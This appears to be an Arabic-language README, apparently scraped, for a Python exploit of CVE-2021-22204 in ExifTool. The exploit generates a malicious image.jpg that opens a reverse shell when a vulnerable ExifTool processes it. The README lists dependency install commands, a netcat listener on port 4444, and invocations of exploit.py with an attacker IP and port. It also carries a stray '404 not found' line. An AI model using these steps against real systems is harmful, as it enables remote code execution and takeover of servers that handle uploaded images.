
استغلال Python لثغرة CVE-2021-22204 في ExifTool، يقوم بتوليد صورة خبيثة تُطلق قشرة عكسية عند معالجتها بواسطة الإصدارات المعرّضة للخطر.
استغلال بلغة Python لثغرة CVE-2021-22204 في أداة Exiftool.
404 غير موجود
python3 python3-pip djvulibre-bin exiftool
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
pacman -S djvulibre libimage-exiftool-perl python python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
dnf install djvulibre libimage-exiftool-perl python-minimal python-pip
brew install djvulibre exiftool python
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
sudo pip install -r requirements.txt
nc -nvlp 4444
chmod +x exploit.py
python3 exploit.py {عنوان IP الخاص بك} {منفذ الاستماع الخاص بك}
./exploit.py {عنوان IP الخاص بك} {منفذ الاستماع الخاص بك}
python3 exploit.py 192.168.0.1 4444
./exploit.py 192.168.0.1 4444
image.jpg
تم اكتشاف ثغرة CVE-2021-22204 والإبلاغ عنها بواسطة William Bowling. (@wcbowling)
تم إنشاء هذا الاستغلال من خلال دراسة تصحيح exiftool بعد الإبلاغ عن الثغرة بالفعل.
وسيؤدي ملف image.jpg إلى تفعيل الثغرة عند فتحه باستخدام إصدار exiftool المعرض للثغرة.